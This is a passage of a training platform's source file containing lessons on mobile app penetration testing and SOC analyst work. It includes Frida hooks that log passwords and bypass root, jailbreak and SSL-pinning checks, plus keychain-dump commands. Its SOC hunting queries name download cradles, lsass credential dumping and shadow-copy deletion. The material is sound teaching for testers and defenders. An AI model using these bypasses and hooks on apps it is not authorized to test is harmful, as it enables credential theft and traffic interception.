NSFileProtectionComplete
  → Data accessible only when device is unlocked
  → Most secure; use for sensitive data

NSFileProtectionCompleteUnlessOpen
  → Can finish writing even after lock
  → For files being actively written

NSFileProtectionCompleteUntilFirstUserAuthentication
  → Default class; accessible after first unlock
  → Persists through locks after first auth

NSFileProtectionNone
  → Always accessible; no encryption
  → Never use for sensitive data
\`\`\`

## Common iOS Weaknesses

- Sensitive data in NSUserDefaults (plaintext plist)
- Keychain items with overly permissive accessibility
- URL scheme handlers without validation
- Disabled ATS exceptions
- Snapshot/screenshot caching of sensitive screens`,

  "mobile-owasp-top10": `## OWASP Mobile Top 10

The 10 most critical mobile application security risks.

## The Risks (2024)

1. **Improper Credential Usage**: Hardcoded credentials, insecure storage of API keys
2. **Inadequate Supply Chain Security**: Vulnerable third-party libraries, malicious SDKs
3. **Insecure Authentication/Authorization**: Weak auth mechanisms, bypassable controls
4. **Insufficient Input/Output Validation**: Injection attacks, XSS in WebViews
5. **Insecure Communication**: Missing encryption, weak TLS, no certificate pinning
6. **Inadequate Privacy Controls**: Excessive data collection, PII exposure
7. **Insufficient Binary Protections**: No obfuscation, tampering detection, or anti-debugging
8. **Security Misconfiguration**: Debug mode enabled, default settings, exported components
9. **Insecure Data Storage**: Plaintext sensitive data in databases, logs, or preferences
10. **Insufficient Cryptography**: Weak algorithms, hardcoded keys, improper implementation

## Testing Each Risk

\`\`\`text
For each risk, check:
1. Static analysis: Review code for patterns
2. Dynamic analysis: Test running app behavior
3. Network analysis: Monitor communications
4. Storage analysis: Examine local data at rest
\`\`\``,

  "mobile-lab-setup": `## Mobile Testing Lab Setup

A proper lab environment is essential for effective mobile security testing.

## Android Lab

\`\`\`bash
# Install Android platform tools
sudo apt install adb

# Create emulator (Android Studio)
# Or use Genymotion for better performance

# Root the device/emulator
# Use Magisk for physical devices
# Most emulators are pre-rooted

# Install Frida
pip install frida-tools
# Push frida-server to device
adb push frida-server /data/local/tmp/
adb shell "chmod 755 /data/local/tmp/frida-server"
adb shell "/data/local/tmp/frida-server &"

# Configure Burp proxy
# Settings → Network → WiFi → Modify → Proxy → Manual
# Host: your-ip, Port: 8080
# Install Burp CA certificate
\`\`\`

## iOS Lab

- **Jailbroken device** (preferred for full testing) or **Corellium** (cloud)
- Install **Cydia/Sileo** for package management
- Install **OpenSSH**, **Frida**, **SSL Kill Switch 2**
- Configure proxy through Settings → WiFi → HTTP Proxy

## Essential Tools

- **Burp Suite Pro**: HTTP(S) proxy and scanner
- **Frida + Objection**: Runtime manipulation
- **jadx**: Android decompiler
- **MobSF**: Automated static/dynamic analysis
- **apktool**: APK disassembly/reassembly
- **Ghidra**: Native binary analysis`,

  // ═══════════════════════════════════════════
  // MOBILE SECURITY — Android Testing
  // ═══════════════════════════════════════════

  "mobile-apk-reversing": `## APK Reverse Engineering

Decompiling Android apps reveals source code, hardcoded secrets, and architectural weaknesses.

## APK Structure

\`\`\`text
app.apk
├── AndroidManifest.xml    ← App configuration, permissions, components
├── classes.dex            ← Compiled Java/Kotlin code (Dalvik bytecode)
├── resources.arsc         ← Compiled resources
├── res/                   ← Layouts, drawables, values
├── assets/                ← Raw files bundled with the app
├── lib/                   ← Native libraries (.so files)
└── META-INF/              ← Signing information
\`\`\`

## Decompilation

\`\`\`bash
# jadx — best for Java source recovery
jadx -d output/ app.apk
# Opens jadx-gui for interactive analysis
jadx-gui app.apk

# apktool — for resources and smali
apktool d app.apk -o app_decoded/

# dex2jar + JD-GUI (alternative)
d2j-dex2jar app.apk
jd-gui app-dex2jar.jar
\`\`\`

## What to Look For

- **Hardcoded secrets**: API keys, passwords, tokens in strings.xml or source
- **Exported components**: Activities/services accessible to other apps
- **WebView configs**: JavaScript enabled, file access, custom URL schemes
- **Network configs**: Certificate pinning implementation, HTTP allowed
- **Obfuscation level**: ProGuard/R8 usage, string encryption
- **Firebase/cloud configs**: google-services.json, API endpoints

\`\`\`bash
# Search for secrets
grep -rn "api_key\\|password\\|secret\\|token" output/
grep -rn "http://" output/  # Insecure HTTP endpoints
\`\`\``,

  "mobile-android-storage": `## Android Data Storage Analysis

Finding sensitive data stored insecurely on the device is a common high-impact finding.

## Storage Locations

\`\`\`bash
# SharedPreferences (XML files)
/data/data/com.app.name/shared_prefs/
adb shell cat /data/data/com.app.name/shared_prefs/*.xml

# SQLite Databases
/data/data/com.app.name/databases/
adb pull /data/data/com.app.name/databases/app.db
sqlite3 app.db ".tables"
sqlite3 app.db "SELECT * FROM users;"

# Internal Storage
/data/data/com.app.name/files/
/data/data/com.app.name/cache/

# External Storage (accessible to all apps!)
/sdcard/Android/data/com.app.name/

# Application Logs
adb logcat | grep "com.app.name"
\`\`\`

## What to Check

- Auth tokens in SharedPreferences without encryption
- Plaintext passwords in SQLite databases
- PII in cache files or logs
- Sensitive data on external storage (world-readable)
- Backup flag enabled (android:allowBackup="true")
- Screenshots/task switcher exposing sensitive screens`,

  "mobile-android-dynamic": `## Dynamic Analysis with Frida

Frida enables real-time hooking and modification of Android app behavior.

## Basic Frida Usage

\`\`\`bash
# List running processes
frida-ps -U

# Attach to running app
frida -U com.target.app

# Run a script
frida -U -l hook.js com.target.app

# Spawn and attach
frida -U -f com.target.app -l hook.js --no-pause
\`\`\`

## Common Frida Scripts

\`\`\`javascript
// Hook a method and log arguments
Java.perform(function() {
    var LoginActivity = Java.use("com.app.LoginActivity");
    LoginActivity.checkPassword.implementation = function(password) {
        console.log("[*] Password: " + password);
        return this.checkPassword(password);
    };
});

// Bypass root detection
Java.perform(function() {
    var RootCheck = Java.use("com.app.security.RootDetector");
    RootCheck.isRooted.implementation = function() {
        console.log("[*] Root check bypassed");
        return false;
    };
});

// Bypass SSL pinning (generic)
Java.perform(function() {
    var TrustManager = Java.use('javax.net.ssl.X509TrustManager');
    var SSLContext = Java.use('javax.net.ssl.SSLContext');
    // ... implement custom TrustManager that accepts all certs
});
\`\`\`

## Objection (Frida wrapper)

\`\`\`bash
# Start objection
objection -g com.target.app explore

# Common commands
android sslpinning disable
android root disable
android hooking list activities
android hooking list classes
android keystore list
\`\`\``,

  "mobile-android-intents": `## Intent & Component Exploitation

Android's Inter-Process Communication (IPC) mechanism can be exploited when components are improperly exported.

## Exported Components

\`\`\`bash
# Find exported components in manifest
grep -E 'exported="true"|<intent-filter' AndroidManifest.xml

# Launch an exported activity
adb shell am start -n com.app/.AdminActivity

# Send a broadcast
adb shell am broadcast -a com.app.CUSTOM_ACTION --es data "malicious"

# Query a content provider
adb shell content query --uri content://com.app.provider/users
\`\`\`

## Deep Link Exploitation

\`\`\`bash
# Test deep links
adb shell am start -a android.intent.action.VIEW -d "myapp://admin/dashboard"
adb shell am start -a android.intent.action.VIEW -d "myapp://transfer?amount=1000&to=attacker"
\`\`\`

## Common Vulnerabilities

- **Unprotected activities**: Access admin panels or bypass authentication
- **Content provider injection**: SQL injection through content providers
- **Broadcast interception**: Eavesdrop on sensitive broadcasts (OTPs, tokens)
- **Intent injection**: Modify intent extras to change application behavior
- **PendingIntent hijacking**: Intercept mutable PendingIntents`,

  // ═══════════════════════════════════════════
  // MOBILE SECURITY — iOS Testing
  // ═══════════════════════════════════════════

  "mobile-ipa-analysis": `## IPA Analysis & Binary Inspection

Analyzing iOS application packages reveals architecture, protections, and embedded secrets.

## IPA Structure

\`\`\`text
app.ipa (renamed .zip)
├── Payload/
│   └── App.app/
│       ├── App (Mach-O binary)
│       ├── Info.plist           ← App configuration
│       ├── embedded.mobileprovision
│       ├── Frameworks/          ← Embedded frameworks
│       ├── Assets.car           ← Compiled assets
│       └── *.storyboardc       ← Compiled storyboards
\`\`\`

## Binary Analysis

\`\`\`bash
# Check architecture and protections
otool -hv App  # Architecture (arm64)
otool -l App | grep -A2 LC_ENCRYPTION  # Encryption check
otool -l App | grep PIE  # Position Independent Executable
otool -l App | grep -A2 STACK  # Stack canaries

# Dump classes and methods
class-dump App > classes.h

# Search for strings
strings App | grep -i "api\\|key\\|secret\\|password\\|http"

# Analyze with Ghidra for native code
\`\`\`

## Info.plist Analysis

- Check ATS exceptions (NSAllowsArbitraryLoads)
- URL schemes (CFBundleURLSchemes)
- Supported orientations and device requirements
- Queried URL schemes (LSApplicationQueriesSchemes)
- Custom permissions usage descriptions`,

  "mobile-ios-storage": `## iOS Data Storage & Keychain

iOS apps store data in various locations with different security levels.

## Storage Locations

\`\`\`bash
# App sandbox (on jailbroken device)
/var/mobile/Containers/Data/Application/<UUID>/

# Directories
Documents/     ← User-generated data, backed up
Library/       ← App support files
Library/Caches/ ← Cached data, may be purged
Library/Preferences/ ← NSUserDefaults (plist files)
tmp/           ← Temporary files

# Check NSUserDefaults
cat Library/Preferences/com.app.name.plist

# Check SQLite databases
find . -name "*.db" -o -name "*.sqlite"
sqlite3 database.db ".tables"

# Check cookies
cat Library/Cookies/Cookies.binarycookies
\`\`\`

## Keychain Extraction

\`\`\`bash
# Using objection
objection -g com.target.app explore
ios keychain dump

# Using keychain-dumper (jailbroken)
./keychain_dumper

# Check keychain accessibility classes
# kSecAttrAccessibleAlways → BAD (accessible even when locked)
# kSecAttrAccessibleWhenUnlocked → GOOD (only when unlocked)
\`\`\`

## Common Findings

- Auth tokens in NSUserDefaults (plaintext plist)
- Passwords in keychain with weak accessibility class
- Sensitive data in snapshot screenshots (\`Library/SplashBoard/\`)
- Cached API responses containing PII
- Cookies with sensitive tokens not marked Secure/HttpOnly`,

  "mobile-ios-runtime": `## iOS Runtime Manipulation

Dynamic analysis of iOS apps using Frida and Objection.

## Frida on iOS

\`\`\`bash
# Install Frida on jailbroken device
# On device: apt install re.frida.server (via Cydia/Sileo)

# List running apps
frida-ps -Uai

# Attach to app
frida -U "Target App"
\`\`\`

## Common Bypass Scripts

\`\`\`javascript
// Bypass jailbreak detection
var paths = ["/Applications/Cydia.app", "/usr/sbin/sshd", "/bin/bash"];
Interceptor.attach(Module.findExportByName(null, "stat"), {
    onEnter: function(args) {
        var path = args[0].readUtf8String();
        if (paths.indexOf(path) > -1) {
            this.shouldManipulate = true;
        }
    },
    onLeave: function(retval) {
        if (this.shouldManipulate) {
            retval.replace(-1);  // File not found
        }
    }
});

// SSL pinning bypass (generic)
// Use objection: ios sslpinning disable
\`\`\`

## Objection for iOS

\`\`\`bash
objection -g "Target App" explore

# Useful commands
ios sslpinning disable
ios jailbreak disable
ios keychain dump
ios cookies get
ios plist cat Info.plist
ios bundles list_frameworks
ios hooking list classes
ios hooking watch class ClassName
\`\`\``,

  // ═══════════════════════════════════════════
  // MOBILE SECURITY — API & Network Testing
  // ═══════════════════════════════════════════

  "mobile-traffic-intercept": `## Traffic Interception & Proxy Setup

Intercepting mobile app traffic is the foundation of API security testing.

## Android Proxy Setup

\`\`\`bash
# 1. Configure Burp to listen on all interfaces (0.0.0.0:8080)
# 2. On device: Settings → WiFi → Modify → Proxy → Manual
#    Host: your-computer-ip, Port: 8080

# 3. Install Burp CA certificate
# Export Burp CA (DER format)
# Push to device
adb push burp_ca.der /sdcard/
# Settings → Security → Install from storage → Select certificate

# For Android 7+ (user certs not trusted by default):
# Option A: Add network security config to APK
# Option B: Install cert as system cert (root required)
adb push burp_ca.pem /system/etc/security/cacerts/
\`\`\`

## iOS Proxy Setup

\`\`\`text
1. Configure Burp to listen on all interfaces
2. On device: Settings → WiFi → [network] → Configure Proxy → Manual
3. Navigate to http://burp in Safari → Download CA certificate
4. Settings → General → Profile → Install Burp certificate
5. Settings → General → About → Certificate Trust Settings → Enable
\`\`\`

## Handling Non-HTTP Protocols

- **WebSocket**: Burp Suite supports WS/WSS interception
- **gRPC**: Use mitmproxy with gRPC support
- **Custom protocols**: Use Wireshark for packet-level analysis
- **Certificate pinning**: Must bypass before interception works`,

  "mobile-cert-pinning": `## Certificate Pinning Bypass

Many apps implement certificate pinning to prevent traffic interception. Here's how to bypass it.

## Bypass Methods

\`\`\`bash
# Method 1: Objection (easiest)
objection -g com.target.app explore
android sslpinning disable  # or ios sslpinning disable

# Method 2: Frida script
frida -U -f com.target.app -l ssl_bypass.js --no-pause

# Method 3: Patch the APK
# Decompile with apktool
apktool d app.apk
# Add network security config allowing user CAs
# Rebuild and resign
apktool b app_decoded/ -o app_patched.apk
\`\`\`

## Android Network Security Config

\`\`\`xml
<!-- res/xml/network_security_config.xml -->
<network-security-config>
    <base-config>
        <trust-anchors>
            <certificates src="system" />
            <certificates src="user" />  <!-- Trust user-installed CAs -->
        </trust-anchors>
    </base-config>
</network-security-config>
\`\`\`

## Universal SSL Pinning Bypass (Frida)

\`\`\`javascript
// Hooks common pinning libraries:
// OkHttp, Retrofit, TrustManager, WebView, Flutter
// Use: frida-multiple-unpinning or ssl-pinning-bypass scripts
// from the Frida CodeShare
\`\`\`

## When Bypass Fails

- App uses custom native pinning (C/C++ level)
- Certificate transparency checks
- Binary integrity checks (detect Frida)
- Solution: Combine multiple techniques or patch the binary directly`,

  "mobile-api-abuse": `## API Abuse & Data Leakage

Mobile APIs often have weaker security controls than their web counterparts.

## Common Mobile API Issues

- **Broken authentication**: Tokens in URLs, weak session management
- **Excessive data exposure**: API returns more data than the UI displays
- **Broken function-level authorization**: Client-side role checks only
- **Mass assignment**: Extra parameters accepted by the API
- **Missing rate limiting**: No protection against brute-force

## Testing Approach

\`\`\`text
1. Proxy all traffic and map every API endpoint
2. Identify authentication mechanism (JWT, OAuth, API key)
3. Test authorization: access other users' data
4. Fuzz parameters: add, remove, modify
5. Check response data: does it include extra fields?
6. Test rate limiting on sensitive endpoints
7. Check for API versioning issues (/v1/ vs /v2/)
\`\`\`

## Data Leakage Vectors

- **Logs**: Sensitive data in Android logcat or iOS device logs
- **Clipboard**: Copy/paste of passwords, tokens
- **Screenshots**: Task switcher captures sensitive screens
- **Backup**: android:allowBackup="true" exposes app data
- **Third-party SDKs**: Analytics, crash reporting sending PII
- **Push notifications**: Sensitive data in notification payload`,

  // ═══════════════════════════════════════════
  // MOBILE SECURITY — Advanced
  // ═══════════════════════════════════════════

  "mobile-binary-exploit": `## Mobile Binary Exploitation

Exploiting native code vulnerabilities in mobile applications.

## JNI (Java Native Interface) Vulnerabilities

\`\`\`text
Android apps load native libraries via System.loadLibrary("native-lib")
Native code (C/C++) is vulnerable to:
- Buffer overflows in string handling
- Format string vulnerabilities
- Use-after-free in complex logic
- Integer overflows in size calculations
\`\`\`

## Analysis with Ghidra

\`\`\`bash
# Extract native libraries
unzip app.apk -d extracted/
ls extracted/lib/arm64-v8a/  # Find .so files

# Load in Ghidra
# Analyze JNI functions (Java_com_app_*)
# Look for unsafe functions: strcpy, sprintf, gets, memcpy without bounds
\`\`\`

## Exploitation Considerations

- **ASLR**: Address Space Layout Randomization (enabled by default)
- **Stack canaries**: Stack smashing protection
- **NX/DEP**: Non-executable stack
- **PIE**: Position Independent Executable

These protections make exploitation harder but not impossible. Techniques like ROP chains and information leaks still apply.`,

  "mobile-malware": `## Mobile Malware Analysis

Analyzing malicious mobile applications to understand their behavior and capabilities.

## Static Analysis

\`\`\`bash
# Decompile and analyze
jadx -d output/ malware.apk

# Check permissions (excessive permissions = red flag)
grep "uses-permission" AndroidManifest.xml

# Look for suspicious APIs
grep -rn "TelephonyManager\\|SmsManager\\|getDeviceId\\|getLine1Number" output/
grep -rn "Cipher\\|SecretKeySpec\\|Base64" output/
grep -rn "Runtime.exec\\|ProcessBuilder" output/
\`\`\`

## Dynamic Analysis

\`\`\`bash
# Run in isolated environment (emulator or sandbox)
# Monitor network traffic
# Use strace for system call monitoring
strace -p <pid> -e trace=network,write

# Use Frida to trace crypto operations
# Hook encrypt/decrypt to capture plaintext data
\`\`\`

## Common Malware Behaviors

- **SMS theft/sending**: Read/send premium SMS
- **Credential harvesting**: Overlay attacks on banking apps
- **Keylogging**: Accessibility service abuse
- **Ransomware**: Device admin API to lock screen
- **Spyware**: Camera, microphone, location tracking
- **C2 communication**: Encrypted beacons to command servers

## Anti-Analysis Techniques

- Emulator detection (check for QEMU, Genymotion artifacts)
- Debugger detection (ptrace, /proc/self/status)
- Root/jailbreak detection
- Time bombs (delay malicious behavior)
- Code obfuscation and string encryption`,

  "mobile-automation": `## Automated Mobile Security Scanning

Build automated pipelines for continuous mobile security testing.

## MobSF (Mobile Security Framework)

\`\`\`bash
# Run MobSF with Docker
docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf

# Upload APK/IPA via web interface at http://localhost:8000
# MobSF performs:
# - Manifest analysis
# - Code analysis (hardcoded secrets, insecure APIs)
# - Binary analysis (protections check)
# - Network security configuration review
# - Dynamic analysis (if configured)
\`\`\`

## CI/CD Integration

\`\`\`yaml
# GitHub Actions example
- name: Mobile Security Scan
  run: |
    # Upload to MobSF API
    curl -F "file=@app.apk" http://mobsf:8000/api/v1/upload -H "Authorization: API_KEY"
    # Get scan results
    curl http://mobsf:8000/api/v1/scan -H "Authorization: API_KEY" -d "hash=HASH"
    # Check for critical findings
    # Fail pipeline if critical issues found
\`\`\`

## Other Tools

- **QARK**: Quick Android Review Kit — finds common vulnerabilities
- **AndroBugs**: Android vulnerability scanner
- **Drozer**: IPC testing automation
- **Objection**: Automated runtime testing
- **Frida scripts**: Custom automation for specific checks`,

  // ═══════════════════════════════════════════
  // SOC ANALYST — Fundamentals
  // ═══════════════════════════════════════════

  "soc-structure": `## SOC Structure & Roles

Understanding how a Security Operations Center is organized and operates.

## SOC Tiers

\`\`\`text
┌─────────────────────────────────────┐
│  L3 — Threat Hunters / Engineers    │  Proactive hunting, detection engineering
│  (Senior, 5+ years)                │  Tool development, advanced IR
├─────────────────────────────────────┤
│  L2 — Incident Responders           │  Deep analysis, complex investigations
│  (Mid-level, 2-5 years)            │  Malware triage, forensics
├─────────────────────────────────────┤
│  L1 — Alert Analysts                │  24/7 monitoring, initial triage
│  (Junior, 0-2 years)               │  Alert classification, escalation
└─────────────────────────────────────┘
\`\`\`

## SOC Models

- **In-house SOC**: Organization operates its own SOC
- **MSSP (Managed Security Service Provider)**: Outsourced monitoring
- **Hybrid**: Core team in-house, extended coverage via MSSP
- **Virtual SOC**: No dedicated facility, distributed team

## Career Progression

\`\`\`text
L1 Analyst → L2 Analyst → L3 Analyst/Hunter
                        → Detection Engineer
                        → IR Lead
                        → SOC Manager → CISO
\`\`\`

## Key Skills

- Log analysis and SIEM proficiency
- Network protocol understanding
- Windows/Linux system internals
- Malware analysis basics
- Scripting (Python, PowerShell, Bash)
- Communication and documentation`,

  "soc-tools-overview": `## SOC Tools & Technology Stack

Understanding the SOC technology ecosystem.

## Core Technologies

\`\`\`text
┌──────────────────────────────────────────┐
│  SIEM (Security Information & Event Mgmt) │
│  Splunk, Elastic, QRadar, Sentinel        │
├──────────────────────────────────────────┤
│  EDR (Endpoint Detection & Response)      │
│  CrowdStrike, Carbon Black, SentinelOne   │
├──────────────────────────────────────────┤
│  NDR (Network Detection & Response)       │
│  Zeek, Suricata, Darktrace                │
├──────────────────────────────────────────┤
│  SOAR (Security Orchestration & Response) │
│  Cortex XSOAR, Shuffle, TheHive          │
├──────────────────────────────────────────┤
│  TIP (Threat Intelligence Platform)       │
│  MISP, OpenCTI, Anomali                   │
├──────────────────────────────────────────┤
│  Ticketing (Case Management)              │
│  TheHive, ServiceNow, Jira               │
└──────────────────────────────────────────┘
\`\`\`

## Log Sources

- **Windows**: Event Logs (Security, System, Application), Sysmon, PowerShell
- **Linux**: Syslog, auth.log, audit.log, journald
- **Network**: Firewall, proxy, DNS, IDS/IPS, NetFlow
- **Cloud**: CloudTrail (AWS), Activity Log (Azure), Audit Log (GCP)
- **Applications**: Web servers, databases, custom apps
- **Identity**: Active Directory, LDAP, MFA platforms

## Data Flow

\`\`\`text
Sources → Log Collectors/Forwarders → SIEM → Alerts → SOAR → Tickets → Response
\`\`\``,

  "soc-shift-ops": `## Shift Operations & Handoffs

SOCs operate 24/7 — effective shift management is critical for continuous coverage.

## Shift Models

\`\`\`text
Common models:
- 3x8: Three 8-hour shifts (08:00-16:00, 16:00-00:00, 00:00-08:00)
- 4x10: Four 10-hour shifts with 3 days off
- 2-2-3 (Panama): 12-hour shifts, rotating pattern
  Week 1: Mon-Tue ON, Wed-Thu OFF, Fri-Sun ON
  Week 2: Mon-Tue OFF, Wed-Thu ON, Fri-Sun OFF
\`\`\`

## Shift Handoff Procedures

1. **Handoff report**: Document all active incidents, pending tasks, and notable events
2. **Dashboard review**: Walk through current alert queue and open investigations
3. **Escalations**: Transfer ownership of in-progress investigations
4. **Threat brief**: Share relevant intelligence or advisories received during shift
5. **Tool status**: Note any systems down, maintenance windows, or outages

## Handoff Template

\`\`\`text
=== SOC Shift Handoff ===
Date: 2026-03-17 | Shift: Day → Swing
Analyst: [Name]

ACTIVE INCIDENTS:
- INC-2024-0042: Possible data exfil (L2 investigating, ETA 2hrs)
- INC-2024-0043: Phishing campaign (IOCs blocked, monitoring)

PENDING TASKS:
- Review 3 escalated alerts from overnight
- Follow up on endpoint isolation (Host-PC045)

NOTES:
- Splunk indexer2 degraded (IT aware, ETA fix: 18:00)
- New Sigma rules deployed at 14:00 — monitor for FPs
\`\`\``,

  // ═══════════════════════════════════════════
  // SOC ANALYST — Alert Triage
  // ═══════════════════════════════════════════

  "soc-alert-categories": `## Alert Categories & Prioritization

Efficient alert classification is the foundation of effective SOC operations.

## Common Alert Categories

\`\`\`text
MALWARE
├── Malware detection (AV/EDR)
├── Suspicious file download
├── Ransomware indicators
└── C2 beacon activity

INTRUSION
├── Brute force / credential stuffing
├── Exploitation attempt
├── Lateral movement
└── Privilege escalation

DATA SECURITY
├── Data exfiltration indicators
├── DLP policy violations
├── Unauthorized access
└── Sensitive file access

POLICY VIOLATION
├── Prohibited software
├── Unauthorized device
├── Policy exception expired
└── Shadow IT usage

NETWORK
├── Port scanning
├── DNS anomalies
├── Suspicious outbound connections
└── Protocol anomalies
\`\`\`

## Prioritization Framework

\`\`\`text
Priority = Severity × Confidence × Asset Value

P1 (Critical): Confirmed active breach, ransomware, data exfil in progress
P2 (High): High-confidence malware, successful exploitation, admin compromise
P3 (Medium): Suspicious activity requiring investigation, policy violations
P4 (Low): Informational, failed attacks, low-confidence indicators
\`\`\``,

  "soc-triage-workflow": `## Triage Workflow & Decision Trees

A systematic approach ensures consistent and complete alert investigation.

## 5-Step Triage Process

\`\`\`text
1. CLASSIFY: What type of alert is this?
   → Malware? Intrusion? Data loss? Policy violation?

2. VALIDATE: Is this alert legitimate?
   → Check for known false positives
   → Verify the detection logic triggered correctly
   → Cross-reference with other data sources

3. ENRICH: Gather context
   → Source/destination IP reputation
   → User identity and normal behavior
   → Asset criticality and location
   → Related alerts (same host/user/timeframe)

4. DETERMINE: True positive or false positive?
   → If FP: Document and tune detection rule
   → If TP: Assess severity and escalate

5. ACTION: Respond appropriately
   → P1/P2: Escalate to L2/IR team immediately
   → P3: Investigate, document, remediate
   → P4: Document, close, monitor
\`\`\`

## Decision Tree Example (Malware Alert)

\`\`\`text
Malware Alert
├── Was the file executed?
│   ├── No → Low risk, verify AV quarantined, close
│   └── Yes → Was it blocked?
│       ├── Yes → Verify block, check for persistence, close
│       └── No → ESCALATE: Check for C2, lateral movement, containment needed
\`\`\``,

  "soc-fp-reduction": `## False Positive Reduction

Reducing false positives is crucial for preventing analyst burnout and improving detection quality.

## Root Causes of False Positives

- Overly broad detection rules
- Legitimate tools triggering security alerts (admin tools, scanners)
- Outdated allowlists/whitelists
- Environment-specific behaviors not accounted for
- Signature-based detection without context

## Reduction Strategies

\`\`\`text
1. TUNING: Refine detection rules with specific conditions
   Before: alert on ANY PowerShell encoded command
   After: alert on encoded PowerShell NOT from approved admin accounts AND
          NOT during maintenance windows AND source NOT in admin subnet

2. ALLOWLISTING: Exclude known-good behaviors
   - Approved scanning tools (Nessus, Qualys)
   - IT admin accounts performing expected tasks
   - Known software update patterns

3. CORRELATION: Require multiple signals
   - Single failed login → Don't alert
   - 10 failed logins in 5 minutes → Alert
   - Failed logins + successful login + sensitive access → Critical alert

4. RISK SCORING: Weight alerts by context
   - Same alert on dev server vs production database → Different priority
   - Alert on service account vs executive account → Different priority
\`\`\`

## Feedback Loop

- Track FP rate per detection rule
- Review and tune top-10 noisiest rules monthly
- Analysts should flag FPs during triage
- Detection engineers process FP feedback within SLA`,

  "soc-log-analysis": `## Log Analysis & Correlation

Effective log analysis is the core skill of a SOC analyst.

## Windows Event Log Analysis

\`\`\`text
Critical Security Events:
4624 — Successful logon (check Type: 3=Network, 10=RDP, 7=Unlock)
4625 — Failed logon (brute force indicator)
4648 — Explicit credential logon (runas, lateral movement)
4672 — Special privileges assigned (admin logon)
4688 — Process creation (with command line if enabled)
4697 — Service installed (persistence)
4698 — Scheduled task created (persistence)
4720 — User account created
4732 — Member added to security group
7045 — Service installation (remote execution)
\`\`\`

## Sysmon Events

\`\`\`text
Event 1 — Process creation (with hashes, parent process, command line)
Event 3 — Network connection (source, destination, port)
Event 7 — Image loaded (DLL loading)
Event 8 — CreateRemoteThread (injection indicator)
Event 10 — Process access (credential dumping)
Event 11 — File created (dropped files)
Event 13 — Registry value set (persistence)
Event 22 — DNS query (C2 resolution)
\`\`\`

## Correlation Examples

\`\`\`text
# Credential dumping detection
Sysmon Event 10 (ProcessAccess to lsass.exe)
+ Event 1 (Process create: mimikatz, procdump, comsvcs.dll)
+ Event 3 (Network connection to external IP)
= HIGH CONFIDENCE credential theft + exfiltration

# Ransomware indicators
Event 11 (mass file creation: .encrypted, .locked)
+ Event 13 (registry: wallpaper change, startup modification)
+ Event 1 (vssadmin delete shadows)
= CRITICAL ransomware activity
\`\`\``,

  "soc-email-analysis": `## Email Security Analysis

Email is the #1 attack vector. SOC analysts must quickly assess email threats.

## Email Header Analysis

\`\`\`text
Key headers to examine:
From: — Display name vs actual address (spoofing check)
Return-Path: — Where bounces go (should match From domain)
Received: — Mail server chain (read bottom to top for true origin)
X-Originating-IP: — Sender's IP address
Message-ID: — Unique message identifier
Reply-To: — Where replies go (often different in phishing)

Authentication results:
Authentication-Results:
  spf=pass (sender authorized)
  dkim=pass (message integrity verified)
  dmarc=pass (alignment check passed)

Red flags: spf=fail, dkim=fail, dmarc=fail
\`\`\`

## Phishing Indicators

- Urgency and fear tactics ("Your account will be suspended")
- Mismatched display name and email address
- Suspicious links (hover to check actual URL)
- Unexpected attachments (.exe, .js, .iso, .zip with macros)
- Lookalike domains (micros0ft.com, goog1e.com)
- Generic greetings ("Dear Customer" vs "Dear John")

## Analysis Workflow

\`\`\`text
1. Extract headers and analyze authentication
2. Check sender reputation (IP, domain)
3. Analyze URLs: VirusTotal, URLScan.io, Any.run
4. Analyze attachments: sandbox detonation, hash check
5. Search for all recipients (was this sent to others?)
6. Check if anyone clicked/downloaded (proxy logs)
7. Block IOCs: sender, URLs, file hashes
8. Notify affected users
\`\`\``,

  // ═══════════════════════════════════════════
  // SOC ANALYST — Threat Hunting
  // ═══════════════════════════════════════════

  "soc-hunting-methodology": `## Threat Hunting Methodology

Proactive threat hunting finds threats that automated detection misses.

## Hunting Approaches

1. **Hypothesis-Driven**: Start with a theory about attacker behavior
   - "An attacker may be using PowerShell to download tools"
   - "There might be lateral movement via RDP from compromised accounts"

2. **Intelligence-Driven**: Start with threat intelligence
   - New APT report → Hunt for specific IOCs and TTPs
   - Industry-specific threats → Hunt for relevant techniques

3. **Analytics-Driven**: Start with data anomalies
   - Unusual outbound data volumes
   - Rare process executions
   - Statistical outliers in user behavior

## Hunt Framework

\`\`\`text
1. HYPOTHESIS: Define what you're looking for and why
2. DATA: Identify required data sources and ensure collection
3. TOOLS: Choose analysis tools (SIEM queries, notebooks, scripts)
4. ANALYZE: Execute queries, review results, pivot on findings
5. FINDINGS: Document discoveries (true threats or benign anomalies)
6. DETECTION: Convert successful hunts into automated detections
7. REPORT: Share findings with the team and stakeholders
\`\`\`

## MITRE ATT&CK Integration

- Map hunts to specific ATT&CK techniques
- Prioritize techniques used by relevant threat actors
- Track hunting coverage across the ATT&CK matrix
- Use ATT&CK Navigator to visualize gaps`,

  "soc-hunting-queries": `## Building Hunting Queries

Effective hunting queries balance specificity with coverage.

## Splunk SPL Examples

\`\`\`spl
# Hunt: PowerShell download cradle
index=sysmon EventCode=1 
  (CommandLine="*DownloadString*" OR CommandLine="*DownloadFile*" 
   OR CommandLine="*Invoke-WebRequest*" OR CommandLine="*wget*" 
   OR CommandLine="*curl*")
  ParentImage!="*\\\\svchost.exe"
| stats count by Computer, User, CommandLine, ParentImage

# Hunt: Processes spawned by Office applications
index=sysmon EventCode=1 
  (ParentImage="*\\\\WINWORD.EXE" OR ParentImage="*\\\\EXCEL.EXE" 
   OR ParentImage="*\\\\POWERPNT.EXE")
  Image!="*\\\\splwow64.exe"
| table _time Computer User ParentImage Image CommandLine

# Hunt: Lateral movement via PsExec
index=windows EventCode=7045 ServiceName="PSEXESVC"
| stats count by Computer, AccountName, ServiceFileName

# Hunt: Large DNS queries (tunneling)
index=dns 
| eval query_length=len(query)
| where query_length > 50
| stats count avg(query_length) by src_ip, query
| where count > 100
\`\`\`

## Elastic KQL Examples

\`\`\`text
# Encoded PowerShell execution
process.name: "powershell.exe" and process.command_line: *encodedcommand*

# Suspicious scheduled tasks
event.code: "4698" and not user.name: ("SYSTEM" or "LOCAL SERVICE")
\`\`\``,

  "soc-anomaly-detection": `## Anomaly & Behavioral Detection

Finding threats through behavioral analysis rather than signature matching.

## User Behavior Analytics (UBA)

\`\`\`text
Baseline normal behavior, then detect deviations:

Login patterns:
- Usual login times → Alert on 3 AM login
- Usual locations → Alert on new country
- Usual devices → Alert on unknown device
- Usual VPN usage → Alert on direct access

Data access patterns:
- Normal file access volume → Alert on mass download
- Usual repositories → Alert on new sensitive shares
- Normal email volume → Alert on mass forwarding

Account usage:
- Service accounts logging in interactively
- Dormant accounts becoming active
